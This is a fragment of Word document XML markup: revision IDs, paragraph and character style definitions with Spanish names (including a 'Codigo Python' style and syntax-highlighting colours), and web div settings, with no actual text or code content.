    <w:rsid w:val="008A2429"/>
    <w:rsid w:val="008A422C"/>
    <w:rsid w:val="008A4A37"/>
    <w:rsid w:val="008A4D0D"/>
    <w:rsid w:val="008A514F"/>
    <w:rsid w:val="008A64C1"/>
    <w:rsid w:val="008A73C7"/>
    <w:rsid w:val="008B0067"/>
    <w:rsid w:val="008B0DA1"/>
    <w:rsid w:val="008B1039"/>
    <w:rsid w:val="008B40BB"/>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2C8"/>
    <w:rsid w:val="008E26D6"/>
    <w:rsid w:val="008E4301"/>
    <w:rsid w:val="008E5ED0"/>
    <w:rsid w:val="008E7409"/>
    <w:rsid w:val="008F13EF"/>
    <w:rsid w:val="008F193A"/>
    <w:rsid w:val="008F2C51"/>
    <w:rsid w:val="008F317B"/>
    <w:rsid w:val="008F3F0F"/>
    <w:rsid w:val="008F4857"/>
    <w:rsid w:val="008F4D39"/>
    <w:rsid w:val="008F61B9"/>
    <w:rsid w:val="008F69D1"/>
    <w:rsid w:val="008F73DD"/>
    <w:rsid w:val="008F777C"/>
    <w:rsid w:val="008F7C78"/>
    <w:rsid w:val="009018EF"/>
    <w:rsid w:val="009033DC"/>
    <w:rsid w:val="00905895"/>
    <w:rsid w:val="00906C5A"/>
    <w:rsid w:val="00907006"/>
    <w:rsid w:val="00907228"/>
    <w:rsid w:val="009072DC"/>
    <w:rsid w:val="0090790B"/>
    <w:rsid w:val="00907DA0"/>
    <w:rsid w:val="00910714"/>
    <w:rsid w:val="00911694"/>
    <w:rsid w:val="00914813"/>
    <w:rsid w:val="00916CB0"/>
    <w:rsid w:val="009203B3"/>
    <w:rsid w:val="00921CB5"/>
    <w:rsid w:val="00922745"/>
    <w:rsid w:val="00922EB6"/>
    <w:rsid w:val="00923263"/>
    <w:rsid w:val="00926A48"/>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232"/>
    <w:rsid w:val="00955B1F"/>
    <w:rsid w:val="00960008"/>
    <w:rsid w:val="00963B37"/>
    <w:rsid w:val="0096460D"/>
    <w:rsid w:val="0096724C"/>
    <w:rsid w:val="009672CB"/>
    <w:rsid w:val="00967ED6"/>
    <w:rsid w:val="009702AA"/>
    <w:rsid w:val="009720F2"/>
    <w:rsid w:val="0097231E"/>
    <w:rsid w:val="009743CF"/>
    <w:rsid w:val="00974C3F"/>
    <w:rsid w:val="0097683F"/>
    <w:rsid w:val="0098026B"/>
    <w:rsid w:val="009802B9"/>
    <w:rsid w:val="009803DF"/>
    <w:rsid w:val="009807BB"/>
    <w:rsid w:val="00980922"/>
    <w:rsid w:val="00982417"/>
    <w:rsid w:val="00982D0E"/>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6B4D"/>
    <w:rsid w:val="009B744D"/>
    <w:rsid w:val="009C02C1"/>
    <w:rsid w:val="009C183D"/>
    <w:rsid w:val="009C3C29"/>
    <w:rsid w:val="009C43B7"/>
    <w:rsid w:val="009C478B"/>
    <w:rsid w:val="009C4C58"/>
    <w:rsid w:val="009C5BC6"/>
    <w:rsid w:val="009C6738"/>
    <w:rsid w:val="009C766F"/>
    <w:rsid w:val="009C7A8F"/>
    <w:rsid w:val="009C7DA5"/>
    <w:rsid w:val="009D1CA2"/>
    <w:rsid w:val="009D28DA"/>
    <w:rsid w:val="009D3E43"/>
    <w:rsid w:val="009D4234"/>
    <w:rsid w:val="009D4447"/>
    <w:rsid w:val="009E0F67"/>
    <w:rsid w:val="009E1914"/>
    <w:rsid w:val="009E3B50"/>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18BC"/>
    <w:rsid w:val="00A22CD8"/>
    <w:rsid w:val="00A23B8D"/>
    <w:rsid w:val="00A24069"/>
    <w:rsid w:val="00A26721"/>
    <w:rsid w:val="00A26F61"/>
    <w:rsid w:val="00A27B38"/>
    <w:rsid w:val="00A305CF"/>
    <w:rsid w:val="00A30DC4"/>
    <w:rsid w:val="00A31F05"/>
    <w:rsid w:val="00A32314"/>
    <w:rsid w:val="00A32D2D"/>
    <w:rsid w:val="00A32FE5"/>
    <w:rsid w:val="00A35E44"/>
    <w:rsid w:val="00A37EB8"/>
    <w:rsid w:val="00A40030"/>
    <w:rsid w:val="00A40428"/>
    <w:rsid w:val="00A40DFA"/>
    <w:rsid w:val="00A42244"/>
    <w:rsid w:val="00A4386F"/>
    <w:rsid w:val="00A44EB4"/>
    <w:rsid w:val="00A465F6"/>
    <w:rsid w:val="00A469B8"/>
    <w:rsid w:val="00A52B55"/>
    <w:rsid w:val="00A53465"/>
    <w:rsid w:val="00A53F55"/>
    <w:rsid w:val="00A54014"/>
    <w:rsid w:val="00A65633"/>
    <w:rsid w:val="00A672DF"/>
    <w:rsid w:val="00A674FC"/>
    <w:rsid w:val="00A71D0F"/>
    <w:rsid w:val="00A72281"/>
    <w:rsid w:val="00A7306B"/>
    <w:rsid w:val="00A73A42"/>
    <w:rsid w:val="00A74302"/>
    <w:rsid w:val="00A75678"/>
    <w:rsid w:val="00A75801"/>
    <w:rsid w:val="00A760E1"/>
    <w:rsid w:val="00A772A0"/>
    <w:rsid w:val="00A7770C"/>
    <w:rsid w:val="00A802CF"/>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5AD6"/>
    <w:rsid w:val="00A96019"/>
    <w:rsid w:val="00AA0068"/>
    <w:rsid w:val="00AA0C42"/>
    <w:rsid w:val="00AA0FF5"/>
    <w:rsid w:val="00AA149F"/>
    <w:rsid w:val="00AA16C2"/>
    <w:rsid w:val="00AA3282"/>
    <w:rsid w:val="00AA33FD"/>
    <w:rsid w:val="00AA36B0"/>
    <w:rsid w:val="00AA44DB"/>
    <w:rsid w:val="00AA50C9"/>
    <w:rsid w:val="00AA5E34"/>
    <w:rsid w:val="00AB1C7E"/>
    <w:rsid w:val="00AB2720"/>
    <w:rsid w:val="00AB2841"/>
    <w:rsid w:val="00AB4F3D"/>
    <w:rsid w:val="00AB6037"/>
    <w:rsid w:val="00AB6E22"/>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16DA8"/>
    <w:rsid w:val="00B20434"/>
    <w:rsid w:val="00B2332F"/>
    <w:rsid w:val="00B23F26"/>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29D"/>
    <w:rsid w:val="00B53B23"/>
    <w:rsid w:val="00B54569"/>
    <w:rsid w:val="00B556C2"/>
    <w:rsid w:val="00B56801"/>
    <w:rsid w:val="00B56D05"/>
    <w:rsid w:val="00B57395"/>
    <w:rsid w:val="00B57C70"/>
    <w:rsid w:val="00B620E0"/>
    <w:rsid w:val="00B62489"/>
    <w:rsid w:val="00B62CC8"/>
    <w:rsid w:val="00B63126"/>
    <w:rsid w:val="00B657C5"/>
    <w:rsid w:val="00B65996"/>
    <w:rsid w:val="00B65D02"/>
    <w:rsid w:val="00B66266"/>
    <w:rsid w:val="00B704F1"/>
    <w:rsid w:val="00B70E77"/>
    <w:rsid w:val="00B71D7A"/>
    <w:rsid w:val="00B732F0"/>
    <w:rsid w:val="00B73CCC"/>
    <w:rsid w:val="00B750D7"/>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2E83"/>
    <w:rsid w:val="00BB4122"/>
    <w:rsid w:val="00BB636A"/>
    <w:rsid w:val="00BB7134"/>
    <w:rsid w:val="00BB749E"/>
    <w:rsid w:val="00BB75A3"/>
    <w:rsid w:val="00BC13CF"/>
    <w:rsid w:val="00BC158F"/>
    <w:rsid w:val="00BC1F77"/>
    <w:rsid w:val="00BC2703"/>
    <w:rsid w:val="00BC4178"/>
    <w:rsid w:val="00BC452D"/>
    <w:rsid w:val="00BC6B54"/>
    <w:rsid w:val="00BD4BB2"/>
    <w:rsid w:val="00BD5211"/>
    <w:rsid w:val="00BD59D1"/>
    <w:rsid w:val="00BD7D8A"/>
    <w:rsid w:val="00BE0681"/>
    <w:rsid w:val="00BE405C"/>
    <w:rsid w:val="00BE57E6"/>
    <w:rsid w:val="00BE6405"/>
    <w:rsid w:val="00BE6986"/>
    <w:rsid w:val="00BE70E2"/>
    <w:rsid w:val="00BF2FB2"/>
    <w:rsid w:val="00BF32DE"/>
    <w:rsid w:val="00BF3B09"/>
    <w:rsid w:val="00BF3B1F"/>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7F3"/>
    <w:rsid w:val="00C148FB"/>
    <w:rsid w:val="00C16D5B"/>
    <w:rsid w:val="00C170EF"/>
    <w:rsid w:val="00C17968"/>
    <w:rsid w:val="00C2189D"/>
    <w:rsid w:val="00C21BD6"/>
    <w:rsid w:val="00C2260C"/>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604B"/>
    <w:rsid w:val="00C574DA"/>
    <w:rsid w:val="00C57D91"/>
    <w:rsid w:val="00C6124A"/>
    <w:rsid w:val="00C619CF"/>
    <w:rsid w:val="00C61B6F"/>
    <w:rsid w:val="00C625C8"/>
    <w:rsid w:val="00C62DDD"/>
    <w:rsid w:val="00C63E08"/>
    <w:rsid w:val="00C63EA7"/>
    <w:rsid w:val="00C65E45"/>
    <w:rsid w:val="00C65FD0"/>
    <w:rsid w:val="00C66143"/>
    <w:rsid w:val="00C6654B"/>
    <w:rsid w:val="00C711A3"/>
    <w:rsid w:val="00C74C35"/>
    <w:rsid w:val="00C758A5"/>
    <w:rsid w:val="00C75F06"/>
    <w:rsid w:val="00C76334"/>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97546"/>
    <w:rsid w:val="00CA4025"/>
    <w:rsid w:val="00CA5D59"/>
    <w:rsid w:val="00CA60C8"/>
    <w:rsid w:val="00CA66F3"/>
    <w:rsid w:val="00CA708A"/>
    <w:rsid w:val="00CA7144"/>
    <w:rsid w:val="00CB3D26"/>
    <w:rsid w:val="00CB5AEF"/>
    <w:rsid w:val="00CB66CC"/>
    <w:rsid w:val="00CB6D57"/>
    <w:rsid w:val="00CC0ABC"/>
    <w:rsid w:val="00CC2471"/>
    <w:rsid w:val="00CC340C"/>
    <w:rsid w:val="00CC723D"/>
    <w:rsid w:val="00CD0260"/>
    <w:rsid w:val="00CD0732"/>
    <w:rsid w:val="00CD0D9E"/>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02A"/>
    <w:rsid w:val="00CF52FB"/>
    <w:rsid w:val="00CF60B1"/>
    <w:rsid w:val="00CF72B2"/>
    <w:rsid w:val="00D00B3F"/>
    <w:rsid w:val="00D01723"/>
    <w:rsid w:val="00D03717"/>
    <w:rsid w:val="00D05F2F"/>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566BA"/>
    <w:rsid w:val="00D6075F"/>
    <w:rsid w:val="00D62CD8"/>
    <w:rsid w:val="00D64522"/>
    <w:rsid w:val="00D663B5"/>
    <w:rsid w:val="00D6770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DA8"/>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3495"/>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019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3EA8"/>
    <w:rsid w:val="00E14EEA"/>
    <w:rsid w:val="00E2259A"/>
    <w:rsid w:val="00E226F5"/>
    <w:rsid w:val="00E236D9"/>
    <w:rsid w:val="00E236F8"/>
    <w:rsid w:val="00E24312"/>
    <w:rsid w:val="00E24ADD"/>
    <w:rsid w:val="00E25C7B"/>
    <w:rsid w:val="00E25E3A"/>
    <w:rsid w:val="00E27847"/>
    <w:rsid w:val="00E279CA"/>
    <w:rsid w:val="00E32299"/>
    <w:rsid w:val="00E34084"/>
    <w:rsid w:val="00E34DEA"/>
    <w:rsid w:val="00E34FF2"/>
    <w:rsid w:val="00E35365"/>
    <w:rsid w:val="00E357F9"/>
    <w:rsid w:val="00E35A33"/>
    <w:rsid w:val="00E3685B"/>
    <w:rsid w:val="00E36D9B"/>
    <w:rsid w:val="00E3755A"/>
    <w:rsid w:val="00E40378"/>
    <w:rsid w:val="00E4053C"/>
    <w:rsid w:val="00E40560"/>
    <w:rsid w:val="00E448D7"/>
    <w:rsid w:val="00E44D64"/>
    <w:rsid w:val="00E44E2B"/>
    <w:rsid w:val="00E46676"/>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9690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4C40"/>
    <w:rsid w:val="00EC609C"/>
    <w:rsid w:val="00EC6F6A"/>
    <w:rsid w:val="00EC7092"/>
    <w:rsid w:val="00EC7349"/>
    <w:rsid w:val="00EC7B03"/>
    <w:rsid w:val="00EC7D7B"/>
    <w:rsid w:val="00ED034E"/>
    <w:rsid w:val="00ED1BA7"/>
    <w:rsid w:val="00ED25F0"/>
    <w:rsid w:val="00ED4221"/>
    <w:rsid w:val="00ED4781"/>
    <w:rsid w:val="00ED4784"/>
    <w:rsid w:val="00ED4C47"/>
    <w:rsid w:val="00ED53AD"/>
    <w:rsid w:val="00ED686C"/>
    <w:rsid w:val="00ED6D55"/>
    <w:rsid w:val="00ED78A5"/>
    <w:rsid w:val="00ED7E3E"/>
    <w:rsid w:val="00EE0B0C"/>
    <w:rsid w:val="00EE1A32"/>
    <w:rsid w:val="00EE21DB"/>
    <w:rsid w:val="00EE3B62"/>
    <w:rsid w:val="00EE6143"/>
    <w:rsid w:val="00EE7808"/>
    <w:rsid w:val="00EE7815"/>
    <w:rsid w:val="00EE7AC6"/>
    <w:rsid w:val="00EF159D"/>
    <w:rsid w:val="00EF27B4"/>
    <w:rsid w:val="00EF3C26"/>
    <w:rsid w:val="00EF4558"/>
    <w:rsid w:val="00EF4701"/>
    <w:rsid w:val="00EF7897"/>
    <w:rsid w:val="00EF7C4E"/>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54EE"/>
    <w:rsid w:val="00F27238"/>
    <w:rsid w:val="00F27AE7"/>
    <w:rsid w:val="00F27B7C"/>
    <w:rsid w:val="00F305A9"/>
    <w:rsid w:val="00F30CC6"/>
    <w:rsid w:val="00F31469"/>
    <w:rsid w:val="00F34F0E"/>
    <w:rsid w:val="00F36AAB"/>
    <w:rsid w:val="00F40B51"/>
    <w:rsid w:val="00F410D9"/>
    <w:rsid w:val="00F4284B"/>
    <w:rsid w:val="00F43337"/>
    <w:rsid w:val="00F43945"/>
    <w:rsid w:val="00F43B04"/>
    <w:rsid w:val="00F445CB"/>
    <w:rsid w:val="00F45F49"/>
    <w:rsid w:val="00F46350"/>
    <w:rsid w:val="00F465B6"/>
    <w:rsid w:val="00F51353"/>
    <w:rsid w:val="00F51E88"/>
    <w:rsid w:val="00F534B2"/>
    <w:rsid w:val="00F54717"/>
    <w:rsid w:val="00F56D76"/>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05E"/>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499C"/>
    <w:rsid w:val="00FC6074"/>
    <w:rsid w:val="00FC6AF3"/>
    <w:rsid w:val="00FC7337"/>
    <w:rsid w:val="00FD0C39"/>
    <w:rsid w:val="00FD11E2"/>
    <w:rsid w:val="00FD2202"/>
    <w:rsid w:val="00FD34B4"/>
    <w:rsid w:val="00FD4C59"/>
    <w:rsid w:val="00FD6241"/>
    <w:rsid w:val="00FD63ED"/>
    <w:rsid w:val="00FD6C65"/>
    <w:rsid w:val="00FE1C66"/>
    <w:rsid w:val="00FE28B6"/>
    <w:rsid w:val="00FE2A92"/>
    <w:rsid w:val="00FE38A0"/>
    <w:rsid w:val="00FE4274"/>
    <w:rsid w:val="00FE66B6"/>
    <w:rsid w:val="00FE7889"/>
    <w:rsid w:val="00FF15AB"/>
    <w:rsid w:val="00FF15EC"/>
    <w:rsid w:val="00FF1610"/>
    <w:rsid w:val="00FF1C08"/>
    <w:rsid w:val="00FF2122"/>
    <w:rsid w:val="00FF3374"/>
    <w:rsid w:val="00FF3EA3"/>
    <w:rsid w:val="00FF4131"/>
    <w:rsid w:val="00FF4743"/>
    <w:rsid w:val="00FF541C"/>
    <w:rsid w:val="00FF5877"/>
    <w:rsid w:val="00FF6DC1"/>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6A07B0"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:numPr>
        <w:ilvl w:val="2"/>
        <w:numId w:val="1"/>
      </w:numPr>
      <w:tabs>
        <w:tab w:val="left" w:pos="1701"/>
      </w:tabs>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uiPriority w:val="99"/>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unhideWhenUsed/>
    <w:rsid w:val="002B361B"/>
    <w:rPr>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="TextonotapieCar1">
    <w:name w:val="Texto nota pie Car1"/>
    <w:basedOn w:val="Fuentedeprrafopredeter"/>
    <w:link w:val="Textonotapie"/>
    <w:uiPriority w:val="99"/>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 w:type="paragraph" w:customStyle="1" w:styleId="Titulo2NONUMERADO">
    <w:name w:val="Titulo 2 NO NUMERADO"/>
    <w:basedOn w:val="Ttulo2"/>
    <w:next w:val="Standard"/>
    <w:qFormat/>
    <w:rsid w:val="00BF3B1F"/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="0"/>
        <w:numId w:val="0"/>
      </w:numPr>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="msonormal0">
    <w:name w:val="msonormal"/>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sz w:val="24"/>
      <w:szCs w:val="24"/>
      <w:lang w:eastAsia="es-ES"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="s0">
    <w:name w:val="s0"/>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969896"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
      <w:lang w:eastAsia="es-ES"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="s1">
    <w:name w:val="s1"/>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paragraph" w:customStyle="1" w:styleId="s2">
    <w:name w:val="s2"/>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A71D5D"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
      <w:lang w:eastAsia="es-ES"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="s3">
    <w:name w:val="s3"/>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63A35C"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
      <w:lang w:eastAsia="es-ES"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="s4">
    <w:name w:val="s4"/>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b/>
      <w:bCs/>
      <w:color w:val="008080"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
      <w:lang w:eastAsia="es-ES"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="s5">
    <w:name w:val="s5"/>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183691"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
      <w:lang w:eastAsia="es-ES"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="s6">
    <w:name w:val="s6"/>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0086B3"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
      <w:lang w:eastAsia="es-ES"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="ln">
    <w:name w:val="ln"/>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character" w:customStyle="1" w:styleId="ln1">
    <w:name w:val="ln1"/>
    <w:basedOn w:val="Fuentedeprrafopredeter"/>
    <w:rsid w:val="00472EBD"/>
    <w:rPr>
      <w:b w:val="0"/>
      <w:bCs w:val="0"/>
      <w:i w:val="0"/>
      <w:iCs w:val="0"/>
      <w:color w:val="333333"/>
      <w:sz w:val="12"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="s01">
    <w:name w:val="s01"/>
    <w:basedOn w:val="Fuentedeprrafopredeter"/>
    <w:rsid w:val="00472EBD"/>
    <w:rPr>
      <w:color w:val="969896"/>
      <w:sz w:val="12"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="s21">
    <w:name w:val="s21"/>
    <w:basedOn w:val="Fuentedeprrafopredeter"/>
    <w:rsid w:val="00472EBD"/>
    <w:rPr>
      <w:color w:val="A71D5D"/>
      <w:sz w:val="12"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="s11">
    <w:name w:val="s11"/>
    <w:basedOn w:val="Fuentedeprrafopredeter"/>
    <w:rsid w:val="00D566BA"/>
    <w:rPr>
      <w:color w:val="333333"/>
      <w:sz w:val="12"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="s31">
    <w:name w:val="s31"/>
    <w:basedOn w:val="Fuentedeprrafopredeter"/>
    <w:rsid w:val="00D566BA"/>
    <w:rPr>
      <w:color w:val="63A35C"/>
      <w:sz w:val="12"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="s41">
    <w:name w:val="s41"/>
    <w:basedOn w:val="Fuentedeprrafopredeter"/>
    <w:rsid w:val="00D566BA"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:color w:val="008080"/>
      <w:sz w:val="12"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="s51">
    <w:name w:val="s51"/>
    <w:basedOn w:val="Fuentedeprrafopredeter"/>
    <w:rsid w:val="00D566BA"/>
    <w:rPr>
      <w:color w:val="183691"/>
      <w:sz w:val="12"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="s61">
    <w:name w:val="s61"/>
    <w:basedOn w:val="Fuentedeprrafopredeter"/>
    <w:rsid w:val="00D566BA"/>
    <w:rPr>
      <w:color w:val="0086B3"/>
      <w:sz w:val="12"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="CodigoPython">
    <w:name w:val="Codigo Python"/>
    <w:basedOn w:val="Cdigo"/>
    <w:qFormat/>
    <w:rsid w:val="00472EBD"/>
    <w:pPr>
      <w:pBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:pBdr>
      <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
      <w:spacing w:before="60" w:after="60"/>
      <w:ind w:left="0" w:right="0"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Textosinformato">
    <w:name w:val="Plain Text"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="TextosinformatoCar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00472EBD"/>
    <w:pPr>
      <w:widowControl/>
      <w:suppressAutoHyphens w:val="0"/>
      <w:autoSpaceDN/>
      <w:textAlignment w:val="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cstheme="minorBidi"/>
      <w:sz w:val="21"/>
      <w:szCs w:val="21"/>
      <w:lang w:val="ca-ES"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="TextosinformatoCar">
    <w:name w:val="Texto sin formato Car"/>
    <w:basedOn w:val="Fuentedeprrafopredeter"/>
    <w:link w:val="Textosinformato"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="00472EBD"/>
    <w:rPr>
      <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cstheme="minorBidi"/>
      <w:sz w:val="21"/>
      <w:szCs w:val="21"/>
      <w:lang w:val="ca-ES"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TDC4">
    <w:name w:val="toc 4"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00B750D7"/>
    <w:pPr>
      <w:widowControl/>
      <w:suppressAutoHyphens w:val="0"/>
      <w:autoSpaceDN/>
      <w:spacing w:after="100" w:line="259" w:lineRule="auto"/>
      <w:ind w:left="660"/>
      <w:textAlignment w:val="auto"/>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B750D7"/>
    <w:pPr>
      <w:widowControl/>
      <w:suppressAutoHyphens w:val="0"/>
      <w:autoSpaceDN/>
      <w:spacing w:after="100" w:line="259" w:lineRule="auto"/>
      <w:ind w:left="880"/>
      <w:textAlignment w:val="auto"/>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B750D7"/>
    <w:pPr>
      <w:widowControl/>
      <w:suppressAutoHyphens w:val="0"/>
      <w:autoSpaceDN/>
      <w:spacing w:after="100" w:line="259" w:lineRule="auto"/>
      <w:ind w:left="1100"/>
      <w:textAlignment w:val="auto"/>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B750D7"/>
    <w:pPr>
      <w:widowControl/>
      <w:suppressAutoHyphens w:val="0"/>
      <w:autoSpaceDN/>
      <w:spacing w:after="100" w:line="259" w:lineRule="auto"/>
      <w:ind w:left="1320"/>
      <w:textAlignment w:val="auto"/>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B750D7"/>
    <w:pPr>
      <w:widowControl/>
      <w:suppressAutoHyphens w:val="0"/>
      <w:autoSpaceDN/>
      <w:spacing w:after="100" w:line="259" w:lineRule="auto"/>
      <w:ind w:left="1540"/>
      <w:textAlignment w:val="auto"/>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B750D7"/>
    <w:pPr>
      <w:widowControl/>
      <w:suppressAutoHyphens w:val="0"/>
      <w:autoSpaceDN/>
      <w:spacing w:after="100" w:line="259" w:lineRule="auto"/>
      <w:ind w:left="1760"/>
      <w:textAlignment w:val="auto"/>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5353041">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0620911">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="35198473">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0258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2700981">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="53310702">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69737062">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3845062">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87384515">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="87653196">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3937325">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7676020">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5464241">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="107282784">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1942051">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="113790336">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0079336">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42625435">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="147477296">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="149563057">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0954512">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6528293">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="167254249">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1675967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69835737">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7893242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4907966">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7862501">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082657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08806079">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="211889375">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25679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498414">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5670106">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6928427">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210941">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89366374">
      <w:bodyDiv w:val="1"/>
